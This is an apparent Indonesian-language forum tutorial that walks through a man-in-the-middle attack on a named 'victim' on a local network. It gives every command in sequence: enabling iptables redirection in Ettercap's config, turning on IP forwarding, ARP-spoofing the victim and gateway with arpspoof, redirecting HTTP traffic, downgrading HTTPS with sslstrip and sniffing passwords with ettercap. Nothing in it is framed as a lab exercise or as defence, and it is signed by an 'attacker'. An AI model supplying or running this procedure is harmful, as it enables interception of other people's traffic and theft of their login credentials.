Pertama, cek konfigurasi Ettercap dengan memasukan command ini di terminal
Code:
gedit /etc/etter.conf
Kemudian cek baris ke 167:
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Hapus karakter pagar di depan line ke 168: "#redir command on ....", sehingga menjadi:
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Save, lalu kita akan menuju tahap kedua. Masukan perintah ini dengan menggunakan terminal:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
Code:
arpspoof -i wlan0 -t [ipaddress korban] [default gateway korban]
kemudian kita akan melakukan proses routing, dimana korban akan dialihkan ke suatu ip address atai port yang telah ditentukan oleh penyerang. Masukan kode berikut. [Catatan: Jangan hentikan proses arpspoof, buat tab baru, atau buka terminal baru untuk melakukan proses routing]
Buka terminal, dan ketik:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
Lalu, ketik juga:
Code:
ettercap -T -q -i wlan0
Pada tahap ini korban tidak akan bisa menuju web manapun yang menggunakan koneksi SSL atau HTTPS karena sudah dirouting ke port 10000.
Disaat krusial ini, kita membutuhkan bantuan SSLstrip untuk mengijinkan korban mengakses HTTPS dengan syarat kebobolan password. Masukan kode berikut:
Code:
sslstrip -a -k -f
Lalu sniffing jaringan kembali menggunakan ettercap, masukan perintah berikut:
Code:
ettercap -T -q -i wlan0
By : Jaka Attacker 404 Not Found